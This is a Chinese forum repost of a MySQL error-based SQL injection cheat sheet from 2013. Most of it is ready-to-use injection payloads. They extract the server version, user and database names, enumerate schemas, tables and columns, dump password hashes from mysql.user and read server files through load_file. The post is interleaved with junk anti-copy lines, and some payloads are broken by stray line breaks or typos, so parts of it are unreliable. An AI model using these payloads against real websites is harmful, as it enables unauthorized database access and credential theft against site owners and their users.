Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
/ ~( z/ k1 S. L+ r3 `
& J' ?  f8 ]5 c, E
Mysql暴错注入参考（pdf），每天一贴。。。
. }7 O; j, A, p3 Q8 ]* `, M
MySql Error Based Injection Reference
* E7 b4 o8 U1 }) U" l[Mysql暴错注入参考]
Authornig0s1992
Blog:http://pnig0s1992.blog.51cto.com/
$ ^) a) F! w: XTeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
$ E+ i0 i) e$ z. o+ ^0 U小部分版本使用name_const()时会报错.可以用给出的Method.2测试
! \. x+ y0 f: x' K" N& S8 N* N查询版本:
9 O1 x+ |. C3 b) JMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
( l" y; _) ^+ B" i5 ~, b) X- Q3 k: Zup by a)b)
查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
5 F( j, a$ F/ j$ i, R1 m4 y) Zand(0)*2))x+from+information_schema.tables+group+by+x)a)
# L, r5 S4 V1 a3 N% w, ^6 s$ {* a查询当前数据库:
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
& \) }6 z4 F  X( G- ^, `6 GMethod.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
- z4 v( `/ N3 P& L依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
顺序替换
1 N9 O, J; k+ d7 R) S+ a爆指定库数目:
* d" ?% o6 K$ G: n' u- v+ Band+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
: P, S; R4 d9 d9 ?4 f; j4 G$ Rable_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
) D* Q& p% |' \/ H6 X1 q: J+by+x)a)+and+1=1 0x6D7973716C=mysql
依次爆表:
$ K+ M5 \& K/ K7 F! `, Sand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
0x6D7973716C=Mysql 将n顺序替换
, {6 b3 H" i; Q0 E7 D( t7 H" s爆表内字段数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
" m7 C. H5 @( ?; O+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
- ~3 e/ O0 u9 C- p& _" ?依次爆字段:
6 r4 X2 @& V$ [' u* e; W  I% Kand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
' [6 Y* f3 A1 t, o1 L8 G1 r9 Gloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
依次暴内容:
! J/ y; _) \$ F! @and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
爆文件内容:
) u$ C: m2 {& p/ u$ k. r  P8 vand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
0 r  ^  {  o6 _4 |5 n0 [7 D5 o3 nfrom+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
, \! l* R3 H' m1 uThx for reading.
. F4 ^3 L2 [& r; I) A7 j
不要下载也可以，